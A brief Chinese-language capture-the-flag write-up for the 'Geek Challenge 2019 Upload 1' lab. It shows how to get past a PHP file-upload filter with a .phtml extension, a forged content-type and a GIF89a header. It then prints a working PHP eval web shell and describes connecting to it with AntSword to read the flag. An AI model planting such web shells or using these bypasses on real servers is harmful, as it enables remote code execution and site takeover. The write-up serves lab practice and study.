[極客大挑戰 2019]Upload 1
阿新 • • 發佈:2021-08-16
1.發現,檔案上傳漏洞
知識點:一個常規上傳題目的知識點:https://www.cnblogs.com/wangtanzhi/p/12243206.html
2.步驟
2.1上傳一句話
1)不知道是怎樣檢查的,要先試一試
一般可以檢查的地方有:
字尾名、content-type、檔案頭的部分內容
先上傳一個php,不做任何修改
2) 接下來試一下phtml+修改content-type
phtml一般是指嵌入了php程式碼的html檔案,但是同樣也會作為php解析
3) 也許檔案頭也檢查了,那就加上GIF89a
4) 測試出來大概就是,字尾名可以是phtml,會檢查content-type,檔案頭的部分,以及<?
所以最後的木馬:
GIF89a?<script language="php">eval($_REQUEST[shell])</script>
5) 在bp裡做修改
6) 上傳成功
7) 猜測在upload/1.php
8) 蟻劍連結
9)終端查詢cat /flag
3.借鑑
https://www.cnblogs.com/wangtanzhi/p/12253607.html
https://www.cnblogs.com/wangtanzhi/p/12243206.html
https://www.cnblogs.com/yunqian2017/p/13308641.html